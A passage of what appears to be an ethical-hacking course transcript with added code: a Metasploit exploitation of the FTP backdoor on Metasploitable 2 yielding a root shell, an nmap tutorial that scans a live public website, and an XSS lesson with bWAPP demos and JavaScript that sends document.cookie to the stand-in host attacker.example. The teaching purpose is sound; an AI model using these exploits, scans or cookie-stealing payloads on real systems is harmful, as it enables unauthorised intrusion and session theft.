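    and filtered ports are not reachable and so are not findings."""
    findings = []
    for e in parse_nmap(output):
        if e.state != "open":
            continue
        for banner, reason in KNOWN_BAD_BANNERS.items():
            if e.version.startswith(banner):
                findings.append((e.port, "vulnerable-version", reason))
        if e.service in CLEARTEXT_LOGIN_SERVICES:
            findings.append((e.port, "cleartext-login",
                             f"{e.service} sends credentials unencrypted; prefer SSH/SFTP"))
    return findings


if __name__ == "__main__":
    for port, category, reason in review(SAMPLE_SCAN):
        print(f"{port:>5}/tcp  {category:<18} {reason}")
```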

To actually make this more believable, if you guys go into your Metasploitable system you can see that you are in the root directory. You can gain root access by going sudo su and entering msfadmin. So we're now the root user in the Metasploitable console. If we go ls we can see the various files, and if you go cd /home we're in the home directory now, and if you do ls out here we can see that there are a bunch of things. There's an ftp folder, there's a hack folder, there's an msfadmin folder, and then service and user. So that's five folders, if you guys remember. Now what we're going to do is gain some backdoor access into the system and create a bunch of folders in the home directory. So let's get on doing that.

To do that we head back to our Metasploit terminal and we go show options, as we had already entered our exploit. As we see, the options that we have to provide are RHOSTS and the port number. The port number has already been set, because it's 21, that's where FTP runs over TCP, and we now just have to set the host. To set the host we have to just put in the IP address of our Metasploitable server. If I remember correctly, it's set RHOSTS 192.168.56.101. So that has set our RHOSTS, and we can again check that we've done it correctly by going show options. And we indeed have set our host. Now all we have to do is run the exploit. So we go and hit run.

As you guys can see, we have actually gained a backdoor: the backdoor service has been found and is being handled, and a command shell session has started. Now you might be confused as to why I have this blinking line. Well, this blinking line actually means that you are inside the Metasploitable server. That means we have already gained backdoor access, and the blinking line denotes that we are on the terminal of Metasploitable 2. Now if you guys don't believe me, let's do some experimenting.

As I had said, I'll create a bunch of folders in the home directory. So let's change to the home directory first, or rather, first you can also do a whoami, and it tells you that you're the root user. Next you go and do cd /home, and that changes to the home directory. Now let's make a bunch of folders, like mkdir this_is_a_test. That should have made a directory, so let's go into that directory: cd this_is_a_test. We're now in the directory this_is_a_test. Now let's make a file called targets.txt. So that creates it. Just to see if we have actually done it properly, let's go back to our Metasploitable. Now in the home directory you go and type in ls again. So let's type in ls and see, and as you guys can see we have created the this_is_a_test folder and it's already available. So let's go and move into that folder, cd this_is_a_test, and we are already in that folder. We have also created a text file which was called targets, so ls should give us a targets.txt.

So as you guys just saw, we gained backdoor access into a remote system through a vulnerability that was available to us on the FTP port. We first did that by scanning the entire domain name server of Metasploitable with nmap and gaining some intelligence as to what ports are running and what ports are actually open. Then we found out that the FTP port is open. Then we went on to Metasploit and we found an exploit for that vulnerability; very successfully we found out how to use the exploit and some information about that exploit, and in the end we actually executed it.


Now you guys must be wondering what exactly is nmap and why should I learn it? Well, nmap is a network scanner that is widely used by ethical hackers to scan networks, as the name suggests. Now, you might wonder why do I need a network scanner? Well, let me give you an example. Suppose you have a Wi-Fi that has been set up in your new house and you realize that your data is being consumed at a faster rate than you are using it. You suspect that it's your pesky neighbour who keeps connecting to your Wi-Fi and eating up all your data. To actually confirm your doubts, what you want to do is a network scan, and nmap is a pretty wonderful tool to do that. Now nmap runs on Linux, Mac OS and Windows, and I'm mostly going to be running this on Linux because that's what I do most of my penetration testing and network testing on.

So let's go ahead and get on with the installation of nmap on your computer. What you do is go apt-get install nmap. For this you have to be logged in as root. If you're not logged in as root, just add sudo before this whole command and it will install it. I already have nmap installed, so I'm not really going to install it again. So let's just go ahead and do a few scans on our website, that is www.edureka.co, and we are going to see what we get back as results.

First of all, let me just show you how you can scan a certain domain name server, or DNS. With nmap we are going to use a flag all the time, so let me just tell you what the flags are. If you just go to nmap and type nmap --help, this will give you all the flags and options that are available to actually use on nmap. So if you are actually stuck and you can't remember stuff, just go in and type nmap --help and it will give you all the stuff. Now network scans generally take a long time, so I'm going to be using the fast mode most of the time. For fast mode, all you have to do is type in nmap -F www.edureka.co and sit and wait for the scan to get over. When the scan gets over you will see a bunch of information; let me just wait till that information pops up and then we will talk about the information together.

Okay, so as you guys can see our scan has been completed. It took 13.71 seconds to actually do the scan. As you guys can see, it shows us the ports, the states and the services. The port is basically the port number that the service bound to it is working on, so we can see that the SSH service is working on port number 22, SMTP on 25, HTTP on 80, rpcbind on 111 and HTTPS on 443. So that is how you can use nmap to scan a certain website. Now if you see, nmap has also given us the public IP of the DNS name, because what nmap does is it looks at the DNS name and then translates it to the IP that is registered for that name on the DNS server. So nmap also returns the public IP. What we can also do is nmap -F 34.210.230.35. Okay, so as you guys can see our command also works when we put in the IP address, and it produces the same results.

Now we can also scan for multiple hosts. Suppose you are on a network and you want to scan multiple hosts; you don't really want to run different commands for that. What you can do is just go in and type nmap and a bunch of IP addresses, like 192.168.1.1 192.168.1.2 192.168.1.3, and what this will do is run the nmap scan on these three different IP addresses, and you did this in just one command. So that's a way you can do this. Now, you can also find out how much of your scan is left by just pressing the up arrow key, and that will give you a constant update on how your scan is going, like 32.4% done, and also show you roughly the time remaining.

Okay, so while this port scan is going on, let me just tell you about the states. The states are open, closed and unavailable. Sometimes you will see that it is unavailable, and that's because some sort of firewall or something is running out there. States can also be closed; in that case mostly nmap will not return you any result, unless you're explicitly looking for something in the closed state. So that was a little trivia on states and how they work. How much of our scan is done? Our scan is 81% done, it takes around another 20 seconds, it should be done soon. Now this scan could be made significantly faster with just the -F tag, but I really want to give you all a good look into how this works. 97, 98, 99. Okay, so as you guys can see this is our result. It gives us a bunch of ports and services. As I just said, this thing can also be closed and also unavailable. So for open and closed we see both examples. Okay, so that was about how you can scan multiple hosts.

So you can also scan multiple hosts with this command, as I will show you. What I do is nmap -F 192.168.1.1-30. What this will do is basically scan everything from 192.168.1.1 to 192.168.1.2 and so on, up to 192.168.1.30. So this is a very useful way of actually scanning multiple IP addresses. Let me just show you how that works. Since we have used the -F flag, this is going to work considerably faster. As you guys can see out here, the previous scan had taken around 119 seconds, so that's around two minutes. This will take considerably less time. So let's see: this was done in 29.91 seconds, and we did 30 IP addresses. So we see that -F surely speeds up the whole scanning process.

Now, you can also give nmap a target list. Let me create a target list, so targets.txt; we've just created it. Now all I want to do is edit this file. So let me just edit that file and put in 192.168.1.1, 192.168.1.2, 192.168.1.3, 192.168.1.5 and 192.168.1.15. Now all we have to do is save it. So that saves it, and Ctrl+X to actually exit. Now you can go ahead and view what is in targets.txt; as you guys can see this is what is in targets.txt. And now you can just pass it to nmap with the -iL flag, and you could say that nmap is going to scan all the IP addresses that are in this file. So let that just run. This will take a little bit of time because it's five IP addresses, and it's really going by the fast mode: 83% of our work is done. Okay, so as we see our scan has been completed. What you see out here are the scan results for whatever we had provided in the targets.txt list. So that's how you can also provide nmap an input file, and it will give you the results for all the targets that were specified in the file.

Now, let's go ahead and talk a little bit about port scanning. nmap is also a brilliant tool for scanning ports. If you have a server or website, you know that there are 65535 ports out there on every server, and almost 99% are unused, so sometimes scanning ports is really necessary. Now you can scan ports by just using the -p flag and specifying the port number, and this is how you would do it: you just specify the IP address or name after that, so I'm going to use nmap -p 20 www.edureka.co. This will scan only port number 20, but you can also scan from port number 20 to 25 with -p 20-25. You can also put in commas and tell nmap you also want to scan all of these: port 80 is HTTP and 443 is HTTPS, so you can surely do that with -p 20-25,80,443. So let me just go ahead and run this. Okay, so that gives us information on the ports that are there.

Now something else about ports. Suppose you want to scan for some HTTP port; you can just say nmap with the -p flag, and you can just say that I want to scan the HTTP port: nmap -p http www.edureka.co, so that will just go ahead and do that. As you guys can see that gives us a result, and you can also add in stuff like mysql, ftp and so on. So let me just show you how that works with http and https: nmap -p http,https, and it's done for the HTTPS port as well. Okay, so as you guys can see these are the ports that are running, and it gave us the results accordingly. Now if you want to scan all the ports, you can use -p- and the IP address or www.edureka.co. This generally takes a lot of time, because you're basically doing 65,000 scans, so I'm not really going to do that. I'm going to quit this out.

Another thing that I want to show you all, that generally takes a lot of time to actually execute, is called something like an aggressive scan. As you guys can see out here, I have done an aggressive scan on edureka. To do that, all you have to do is nmap -A and then www.edureka.co. Let us see how much time this took to actually execute: 459 seconds. That's a long time for a scan, but it gives us a bunch of other information. For example, it gives us the traceroute. So what is the traceroute, first of all? Traceroute is the route taken by a packet to actually reach the client from the target server. As you guys can see our packet had 22 hops. The first hop was to the gateway router, that is 192.168.1.1, then it went to the Airtel leased line, then to this IP address, then it went to a bsnl.net host, and it went to London, New York, Chicago, and went all the way up to wherever this thing is hosted. That was some information, and then there is some other information given to us like the open TCP ports, tcpwrapped services, program versions, port types, port states, and all sorts of other information is given in an aggressive scan.

Another scan that I have previously done and kept for you all, because it takes a lot of time, is something called the service version scan: nmap -sV, where the V is capital, will give you the service version. So it tries to actually guess the version of the service that is running. For example, on the SMTP port it tells us it is Postfix smtpd, or for the Apache, it's Apache httpd. You can see all sorts of versions here. Another thing nmap is generally brilliant at is guessing the operating system that is running. I have already done this scan previously, because this takes a humongous amount of time that I don't really have: that is 386.34 seconds, and this scan together basically took me ten minutes, and I don't really have that kind of time for explaining all this stuff. So as you guys could see out here, the OS guess, or kind of the OS details, is what you get for the -O flag: it kind of tries to guess the OS from the time to live that is in the response to the packets that it sends. So -sV, -O and -A are some really cool things that you might want to know.
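Added example, not from the course: the TTL-based guess that nmap -O is described as making, written out as a heuristic in Python. It assumes the usual initial TTL defaults (64 for Linux-like stacks, 128 for Windows, 255 for many network devices), takes a constructed set of observed reply TTLs, and cross-checks the inferred hop distance against a traceroute hop count like the 22 hops seen above.

```python
# Added example: a TTL-based operating-system guess of the kind the tutorial
# says `nmap -O` makes. The initial TTL defaults below are common vendor
# defaults assumed here, not values taken from the course.
INITIAL_TTLS = {
    64: "Linux/Unix-like",
    128: "Windows",
    255: "network device or Solaris",
}


def guess_from_ttl(observed_ttl: int):
    """Return (os_family, hop_distance) for a TTL seen in a reply packet.

    Each router on the return path decrements the TTL by one, so the sender's
    initial value is the smallest common default that is >= the observed
    value, and the difference is the number of hops the reply travelled.
    """
    if not 1 <= observed_ttl <= 255:
        raise ValueError(f"TTL out of range: {observed_ttl}")
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return INITIAL_TTLS[initial], initial - observed_ttl
    raise AssertionError("unreachable: 255 is the largest default")


def consistent_with_traceroute(observed_ttl: int, traceroute_hops: int,
                               slack: int = 2) -> bool:
    """Sanity check: does the TTL-derived distance agree with the hop count a
    traceroute measured? Forward and return paths are not always symmetric,
    so a little slack is allowed; a large mismatch means the guess is shaky."""
    _, distance = guess_from_ttl(observed_ttl)
    return abs(distance - traceroute_hops) <= slack


# Constructed observations (host label, TTL of the reply); not data from the page.
SAMPLE_REPLIES = [("web-1", 42), ("dc-1", 116), ("edge-router", 251), ("lan-box", 64)]


def guess_all(replies=SAMPLE_REPLIES):
    """Map each host label to its (os_family, hop_distance) guess."""
    return {host: guess_from_ttl(ttl) for host, ttl in replies}


if __name__ == "__main__":
    for host, (family, hops) in guess_all().items():
        print(f"{host:12} looks like {family:<26} about {hops} hops away")
```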


Another thing that you can do is traceroute, as I had just told you all, and you can do traceroute separately. So you go --traceroute and then you say the name of any sort of website. Suppose I want to know how I reach netflix.com. So I go netflix.com and this will give me a traceroute that shows me how my packet actually reaches netflix.com. Okay, so this is basically... it was a direct one hop. Okay, so that was surprising. On the other hand, if I were to do this on edureka.co it would take a bunch of hops to actually reach it; let's just give it some time to run. Okay, so it's 94% done; I'm just waiting for it to get completed. Okay, so this gave us the hops, and as you guys can see we took twenty two hops to actually reach edureka.co. It's the same process: you go through a bunch of IP addresses and then you reach this thing called us-west-2.compute.amazonaws.com. Okay, so that was about traceroute. Now, just to end this tutorial:

Let me just tell you guys that you can also save a file with nmap, and that is basically to save whatever you found from a scan into a file. Let me just show you how to do that. Sometimes when you are working as a security analyst you will have to perform network scans on a wide area network that is huge. These scans take a lot of time and you don't really have the space on your command line to actually store that and see it in a way that is feasible for analysis. So what you want to do is actually save it in a file. What you can do is say nmap -oN and then the name of the file, say results.txt, and we could save this for www.edureka.co. So whatever scan result is going to be generated is going to be stored in this file called results.txt. Now, this file need not exist from before; it will just be created by nmap. And now you see, if I do ls, we have a targets.txt and a results.txt. Now if I just cat that file, or let me just less it, results.txt, what you see out here is an nmap scan result that is stored.

Another thing that I would like to show you all before I end this nmap tutorial is the verbose mode. Verbose mode is basically what we were getting when we were pressing the up arrow to see how much of our scan is done. You can basically get that throughout the scan: nmap -F -v www.edureka.co, with -v for verbose, and this will basically give you a verbose view of what is actually going on. It'll tell you everything, and there it's done, and we have finished our nmap tutorial.


So first of all, what exactly is cross-site scripting? Well, cross-site scripting refers to client-side code injection attacks wherein an attacker can execute a malicious script, also commonly referred to as a malicious payload, in a legitimate website or web application. Now XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of something like unvalidated or unencoded user input within the output that it generates. Now by leveraging XSS an attacker does not target a victim directly; instead an attacker would be exploiting a vulnerability within a website or a web application that the victim would visit, essentially using the vulnerable website or web application as a vehicle to deliver a malicious script to the victim's browser.

Now while XSS can be taken advantage of within VBScript, ActiveX and Flash, unquestionably the most widely abused is JavaScript. This is mostly because JavaScript is fundamental to any browsing experience: all the modern sites today have some JavaScript framework running in the background. Now XSS can be used in a range of ways to cause serious problems. Well, the traditional use of XSS is the ability for an attacker to steal session cookies, allowing an attacker to possibly impersonate a victim, and it just doesn't stop there. XSS has been used to wreak havoc on social websites, spread malware, deface websites and phish for credentials, and has even been used in conjunction with some clever social engineering techniques to escalate to even more damaging attacks.

Now cross-site scripting can be classified into three major categories. The first is reflected cross-site scripting, the second is stored or persistent cross-site scripting, and the third is DOM-based cross-site scripting. Out here DOM refers to the Document Object Model that is used for web application building. So let's take a moment to discuss the three types of cross-site scripting.

So the first one we're going


to be discussing is reflected

cross-site scripting Now

by far the most common type


of cross-site scripting

that you'll become.

Because is probably reflected


cross-site scripting here.

The attackers payload

is a script and has


to be part of a request

which is sent to the web server


and reflected back in such a way

that the HTTP response


includes the payload

from the HTTP request Now


using a phishing email

and other social engineering


techniques the attacker layers

in the victim to inadvertently


make a request to the server

which contains the cross


site scripting payload,

and then he ends up


executing the script

that gets reflected and cute it


inside his own browser.

Now since reflected cross-site


scripting isn't really

a persistent kind
of attack the attacker
needs to deliver

this payload to each victim

that he wants to serve.

So a medium like a social


network is very conveniently

used for destination


of these attacks.

So now let's take


a step by step.

Look at how cross-site


scripting actually works.

So firstly the attacker


crafts a URL containing

a malicious string
and sends it to the victim.

Now the poor victim


is tricked by the attacker

into requesting the URL


from the website,

which is running
a I respond script

and then the website


includes the militia string

from the URL in the response.

And then in the end


the victims browser executes,

the malicious script


inside the response sending

the victims cookies to


the attacker silver.

Okay.

So at first reflected xss


might seem very harmless

because it requires a victim


himself to actually send

a request containing
a militia string now
since nobody would be
willingly attacking himself.

So there seems to be

no way of actually
performing the attack but

as it turns out there are


at least two common ways

of causing a victim
to launch a reflected
cross-site scripting attack on himself.

So the first way is
if the attacker targets


a specific individual

and the attacker can send


the malicious URL to the victim.

For example using email


or for example instant messaging

and then trick him


into visiting the site.

Secondly, if the attacker
targets a large group
of people, the attacker


then can publish the link

or the malicious URL
on his own website


or social media,

and then he'll just wait


for visitors to click on it.

So these two methods are similar

and both can be very


successful with the use

of a URL shortening service


like one provided by Google.

So this masks the malicious
string from users
who might otherwise identify it.

Okay.
So that was all about
reflected cross-site scripting.

Let's move on to stored
cross-site scripting now.

So the most damaging type


of cross-site scripting

that is there today


is persistent or stored
cross-site scripting.

In stored
cross-site scripting attacks,
the attacker is injecting


a script into the database

that is permanently stored


on the target application.

So a classic example

is a malicious script
inserted by an attacker

in the comment field of
a blog or a forum post.

So when a victim navigates
to the affected web page
in a browser,
the cross-site scripting
payload will be served
as a part of the web page,
just like any legitimate
comment would be.

This means that the victim
will inadvertently end up
executing the malicious script
once the page is viewed


in the browser.

Now, let's also take


a step by step.
Look at how cross-site scripting
in the stored version works.

So first the attacker uses one
of the website's forms to insert
a malicious string into
the website's database.

Now the victim unknowingly
requests the page

from the website

and then the website includes
the malicious string

from the database


in the response

and then sends it to the victim.

Now the poor victim's browser
will actually execute
the malicious script
inside the response,
sending all the cookies
to the attacker's server.

So that's basically

how stored or persistent


cross-site scripting works.
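The reflected and stored flows described above, shown side by side as an added example that is not part of the course or of any project it mentions. The host names, the COOKIE_THIEF payload and the in-memory CommentStore (standing in for the database table) are constructed for the demo; nothing touches the network, so it runs offline under Node.js.

```javascript
// Added example (not from the course): a tiny server-side renderer that
// reflects a search term (reflected XSS) and renders stored comments
// (stored XSS), once unsafely and once with HTML escaping.

// Replace the five characters that can break out of an HTML text node
// or a double-quoted attribute with their character references.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Reflected: the "q" query parameter comes straight back in the response.
// With safe=false the payload is copied into the HTML verbatim.
function renderSearchPage(requestUrl, safe) {
  const q = new URL(requestUrl).searchParams.get('q') ?? '';
  const shown = safe ? escapeHtml(q) : q;
  return `<h1>Results for: ${shown}</h1>`;
}

// Stored: comments are persisted (here, an array standing in for the
// database table) and served to every later visitor of the page.
class CommentStore {
  constructor() { this.rows = []; }
  add(author, body) { this.rows.push({ author, body }); }
  renderAll(safe) {
    return this.rows
      .map(({ author, body }) => {
        const a = safe ? escapeHtml(author) : author;
        const b = safe ? escapeHtml(body) : body;
        return `<li><b>${a}</b>: ${b}</li>`;
      })
      .join('\n');
  }
}

// Constructed payload of the kind the course describes: it ships
// document.cookie to a hypothetical attacker-controlled host.
const COOKIE_THIEF =
  "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>";

// Attack URL the victim is lured into requesting (reflected case).
const ATTACK_URL = 'https://shop.example/search?q=' + encodeURIComponent(COOKIE_THIEF);

// True if the rendered HTML still contains an executable <script> tag,
// i.e. the payload survived rendering without being escaped.
function containsLiveScript(html) {
  return /<script[\s>]/i.test(html);
}

console.log('reflected, unsafe:', renderSearchPage(ATTACK_URL, false));
console.log('reflected, safe  :', renderSearchPage(ATTACK_URL, true));
const store = new CommentStore();
store.add('mallory', COOKIE_THIEF);
console.log('stored, unsafe   :', store.renderAll(false));
console.log('stored, safe     :', store.renderAll(true));
```

The unsafe outputs carry a live script tag that the victim's browser would run; the safe outputs show the same payload as harmless text, which is the whole difference between a vulnerable page and a fixed one.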

Now it's time for the last type


of cross-site scripting

which is document object model


based cross-site scripting.

So DOM-based cross-site
scripting is an advanced type
of cross-site scripting attack,
which is made possible
when the web application's
client-side script writes
user-provided data to
the Document Object Model.

Basically it means
that the data is subsequently read
from the Document Object Model
by the web application
and output to the browser.

So if the data is incorrectly


handled in this place

an attacker can very
well inject a payload,

which will be stored as a part


of the document object model

and then executed

when the data is read
back from the DOM.

Now, let's see how
that actually happens.

So first the attacker crafts
a URL containing

a malicious string
and sends it to the victim.

Now this victim is again


tricked by the attacker

into actually requesting


the URL from the website.

This is like the primary step

in actually performing
cross-site scripting.

Now the third step is

that the website receives


the request but does not include
the malicious string
in the response.

Here's the catch of


dom-based cross-site scripting.

So now the victims browser


executes the legitimate script

inside the response.

Causing the malicious script


to be inserted into the page

that is, basically,
through the innerHTML property.

And the final step is that
the victim's browser then
executes the malicious script
inserted into the page
and sends
the victim's cookies
to the attacker's server.

Now as you guys
must have realized,
in the previous
examples of persistent
and reflected cross-site
scripting the server inserts

the malicious script


into the page,

which is then sent as


a response to the victim now

when the victims browser


receives the response, it assumes
that the malicious script
is a part
of the page's legitimate content

and then automatically


executes it during page load,
as it would any other script.

But in a DOM-based attack,
there is no malicious script
inserted as a part of the page.

The only scripts

that are actually
automatically executed
during the page load are
a legitimate part of the page.

So that's the scary part.

So the problem is

that this legitimate script
directly uses user input
in order to add
HTML to the page.

So the malicious string
is inserted into the page
using innerHTML,
so it's parsed as HTML.

So mostly, people
who are auditing
or surveying a server for
cross-site scripting vulnerabilities
will not actually be
checking the client side.

So it's a very subtle difference


but it's very important.

So in traditional cross site


scripting, the malicious
JavaScript is actually executed
when the page is loaded, as
a part of the HTML sent by the server,
and in DOM-based
cross-site scripting
the malicious JavaScript
is executed at some point
after the page has
already been loaded,
because the page's
legitimate JavaScript treats
user input
in an unsafe way.
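The DOM-based flow described above, as an added example that is not part of the course. FakeElement is a constructed stand-in for a DOM element so the logic can run under Node.js without a browser; in a real page `el` would be document.getElementById('greeting') and pageUrl would be location.href. The host name and the DOM_PAYLOAD string are assumptions made for the demo.

```javascript
// Added example (not from the course): the page's own legitimate script
// reads untrusted data from the URL fragment and writes it into the
// document, once through innerHTML (vulnerable) and once through
// textContent (fixed).

// Stand-in for an HTMLElement. It stores the serialized markup a browser
// would hold: innerHTML takes markup as-is, textContent escapes the
// characters that would otherwise start a tag or an entity.
class FakeElement {
  constructor() { this.html = ''; }
  set innerHTML(markup) { this.html = String(markup); }
  get innerHTML() { return this.html; }
  set textContent(text) {
    this.html = String(text)
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;');
  }
}

// What a browser actually transmits for a URL: path and query only. The
// fragment (#...) never leaves the client, so the server cannot see, log
// or filter a payload that is placed there.
function requestTarget(pageUrl) {
  const u = new URL(pageUrl);
  return u.pathname + u.search;
}

function nameFromFragment(pageUrl) {
  return decodeURIComponent(new URL(pageUrl).hash.slice(1));
}

// Vulnerable sink: mirrors page code such as
//   el.innerHTML = 'Hello ' + decodeURIComponent(location.hash.slice(1));
// Whatever markup the fragment contains becomes part of the live DOM.
function greetUnsafe(el, pageUrl) {
  el.innerHTML = 'Hello ' + nameFromFragment(pageUrl);
  return el.innerHTML;
}

// Fixed sink: textContent treats the data as text, so '<' is a character,
// never the start of a tag.
function greetSafe(el, pageUrl) {
  el.textContent = 'Hello ' + nameFromFragment(pageUrl);
  return el.innerHTML;
}

// Rough check for markup that runs on its own once it is parsed into the
// DOM: a tag carrying an on* event-handler attribute. A <script> element
// inserted through innerHTML is not executed by browsers, which is why
// DOM XSS payloads use handlers such as <img src=x onerror=...> instead.
function hasAutoExecutingMarkup(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed payload: a broken image whose error handler runs JavaScript.
const DOM_PAYLOAD = '<img src=x onerror="alert(document.cookie)">';
const VICTIM_URL = 'https://portal.example/welcome#' + encodeURIComponent(DOM_PAYLOAD);

const el = new FakeElement();
console.log('server sees  :', requestTarget(VICTIM_URL));
console.log('innerHTML    :', greetUnsafe(el, VICTIM_URL));
console.log('textContent  :', greetSafe(el, VICTIM_URL));
```

The request line the server receives is `/welcome` with no trace of the payload, which is exactly why server-side filtering and logging never see a DOM-based attack; the fix has to live in the client-side code that chooses the sink.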

So now that we have actually


discussed all the three types

of cross-site scripting

that are widely seen today.

Now, let's see what can happen
if you actually were a victim
of cross-site scripting.

So the consequences of
what an attacker can do
with the ability
to execute JavaScript
on a web page may not immediately
stand out to you guys,
especially
since browsers like Chrome
run JavaScript
in a very tightly controlled
environment these days,
and JavaScript has
very limited access
to the user's operating system
and files.

But when considering
that JavaScript has access
to the following
things we're going
to discuss, we can see
how creative
attackers can get.

So firstly, malicious
JavaScript has access
to all the same objects
that the rest of the web page
has, so this includes
cookies. Now,
cookies are often used
to store session tokens,
and if an attacker can obtain
a user's session cookie,
they can impersonate that user
on that site.

Secondly JavaScript can read


and make arbitrary modifications

to the browser's
document object model.

So the page can be rewritten
with all sorts of content
without anything changing
on the server side.

Now, JavaScript can be used
with XMLHttpRequest (or fetch)
to send HTTP requests
with arbitrary content
to arbitrary destinations.

And the scariest part is
that JavaScript in modern
browsers can leverage HTML5 APIs
such as accessing a user's
geolocation, webcam, microphone
and whatnot, and even
specific files from
the user's file system.

Now, while most of these APIs
require the user to opt in,
cross-site scripting
in combination
with some very
clever social engineering
can bring an attacker
a very long way. Now,


the above in combination

with social engineering

as I just said allows

an attacker to pull
off advanced attacks,
including cookie theft,
keylogging, phishing
and identity theft.

Now, critically, cross-site scripting
vulnerabilities provide

The perfect ground

for attackers to escalate


attacks to more serious ones.

So now that we understand what


cross-site scripting attacks are

and how damaging they can be


to your application.

Let's dive into the
best-known practices

that are actually followed to


prevent them in the first place.

So the first mechanism


that is used is called escaping.

So escaping data means
taking the data an application
has received and ensuring
that it's secure before actually
rendering it for the end user.

Now by escaping
user input, key characters
in the data received by
a web page will be prevented
from being interpreted
in any malicious sort
of way. In essence,
you're censoring the data
your web page receives in a way
that neutralizes characters,
especially the angle brackets
that begin HTML tags
like <script> and <img>,
so these will be stopped
from being rendered as markup,
which would otherwise cause harm
to your application,
users and database.

If your page doesn't allow
users to add their own markup
to the page, a good rule of thumb
is to escape any
and all HTML, URL
and JavaScript entities.

However, if you
are running a forum

and you do allow users
to add rich text to your content,

you have a few choices.

So firstly you will need


to carefully choose

which HTML entities


you will escape

and which you won't,
or use a replacement format
for raw HTML such as Markdown,
which will in turn allow
you to continue escaping all
HTML characters.

Now the second method
that is normally used
is called validating input.

Validating input is the process
of ensuring an application
is rendering the correct data
and preventing malicious data
from doing harm to the site,
the database and the users.

So while whitelisting and input
validation are more commonly
associated with attacks
like SQL injection,
they can also be used as
an additional method

of prevention for
cross-site scripting attacks.

So input validation
is especially helpful

and good at preventing


cross-site scripting in forms

as it prevents a user
from adding special
characters into the fields,
or refuses
the request completely.

But in fact,
input validation is

not the primary method of


prevention for vulnerabilities

such as cross-site scripting

and even SQL injection


for that example,

but instead they help to reduce


the effects should an attacker

actually discover such


a vulnerability in your system.

Now the third way to prevent


cross-site scripting attack

is to sanitize user input.

So sanitizing data
is a strong defense

but should not be used alone

to battle cross-site
scripting attacks.

It's totally possible
that you will find the need


to use all three methods

of prevention in working towards


a more secure application.

Now as you guys might notice,
sanitizing user input is
especially helpful on sites
that allow HTML markup, to ensure
the data received can do no harm
to users as well
as your database,

by scrubbing the data clean


of potentially harmful markup

and changing the


unacceptable user input

into an acceptable format.

OK guys.

So that was all the theory about
cross-site scripting. It's time
for the demo right now.

So for the demonstration now,

I'm going to be showing


you guys the three types

of cross-site scripting

that we have discussed


throughout the course

of the session.

So not only will it be
rather interesting to see

how cross-site scripting works


on a vulnerable web application,

but it will also give

us a better understanding
of cross-site scripting

in itself. Now, performing
cross-site scripting
against a system you don't own
is a very big crime,
so we really can't target
any random web platform, website
or web application
for that matter.
So keeping that thing in mind I

have chosen the broken


web application project.

So this is brought
to us by OWASP,
which stands for Open Web
Application Security Project.

The Broken Web Applications
project, or BWA, is

a broken web application

that is intentionally vulnerable

and it incorporates
a majority of the known bugs

that are out there


and it is widely used by
security enthusiasts, students
and practicing ethical hackers


to mostly practice

and nurture their skills


in the right direction.

Okay, so to get started


first of all,

we need to download a few


files and get things ready.

So first of all,
we will download the broken web
application project

and I'll be leaving


the download link

in the description just in case


you guys want to practice

in your own free time.

Secondly.

We need to download
VirtualBox.

Now after we have


both the files ready
and we have it installed

and we have our broken


web application installed

in the virtual machine.

We are good to go.

Now.

I've already done


all that boring job

and actually installed


the broken web application

as you guys can see.

I'm already running
the OWASP broken web application
on my virtual machine.

And this is the OWASP
virtual machine.

So as you guys can see


it's based off Linux

and if we go ifconfig,

it'll give us the IP address


that it's running on.

So as you guys can see,
it's running on 192.168.146.4,


so If we just head over there,

yeah, I've already open that up.

We get a portal.

So for this
particular demonstration,

I'm going to be using the broken


web application project

and also webgoat.

So first of all,

let's head over to the broken


web application project.

So we'll be greeted
with a login screen out here,
and the credentials
for this are bee and bug,

as you guys can see,

so just go and enter login


after you enter the credentials.

Okay, so y'all will be


welcomed with a place

where you can choose your bug

and you can also choose


the amount of security

that you want to practice with.

So since this is
a very simple demonstration,

I'm going to set
the security to low.

And the first thing

that we're going


to test is actually

reflected cross-site scripting.

So reflected cross-site
scripting mostly has to do
with the GET request
when we are actually
coding on the back end.

So, let's see.

First of all we go ahead

and choose reflected cross-site


scripting for the get method

and we go and press hack.

Now will be presented


with a form.

Now a form is a very good way
of actually showing
reflected cross-site scripting,
because normally when
an attacker is trying
to attack you, he'll be trying
to send you a form, or any way
you can actually input
something into the site.

So interestingly,

if we go and just input nothing
into these two fields
and just go, we'll see
the URL change out here.

So firstly, you guys see
that the fields are
very clearly visible
in the URL. These are the two fields,
and that means
that it's an unencoded input.

So this is a very rich place

to actually practice
your web vulnerability

and penetration testing skills.

So if I were to hack it,

I would try and run


a script out here.

So if I were to go script

and I've already


practiced a few out here

as you guys can see,

so if you go script alert,

this is an example
of reflected xss.

Yeah, and if we go and just


end the script out here.

This is going to actually render

the JavaScript input


as a part of the page

and we are going to get


an output because of this.
So that's how reflected
cross-site scripting
is actually working.

So as you guys can see,
the web application has actually

rendered our JavaScript


and now we can see

that reflected cross-site

scripting is actually
working out here.

So now you guys


must have realized

that in a practical scenario,
the link to this form must be
sent to the victim,
who must be tricked
into submitting the form
for the attack to be successful.

Also in more practical scenarios

where sites are


also having forms.

They're going to be putting
filters on
the input parameters such
that you cannot run
JavaScript in them
and you also cannot input
any unencoded input into them.

So that was all
about reflected
cross-site scripting.

So now let's move
on to stored cross-site scripting,

which is the most dangerous form


of cross-site scripting.

Okay, so as I had discussed

the comment sections are


normally the best place

for actually stored


cross-site scripting.

So as you guys can see out here,
we already have
a few comments
that I had added for practicing.


Now in stored cross-site
scripting, the attacker
is normally attacking the data
that is stored.

So basically we are going


to inject the script

into the database


into the server.

So if the script has
some malicious intent,
it can do
a multitude of things,
but we will not get into that.

So for that reason,

let's first add


a normal comment out here.

So let's say

if this was blog


I'd say good job there.

Like I said
or something like hey,

man, nice work.

If you go and
press submit, okay,

it's showing this is


an example of persistent
cross-site scripting

because I had already
inserted a malicious script.

So this is that script out


here the second input but just

for demonstration purposes.

Let's go in and put it again


so we can also input raw data

that is unencoded input


in the form of script.

So let's go alert,
and let's say it prints hello world.

So if we go and press submit,
at first it runs
that other cross-site script,
and then it will say
that this page isn't working.

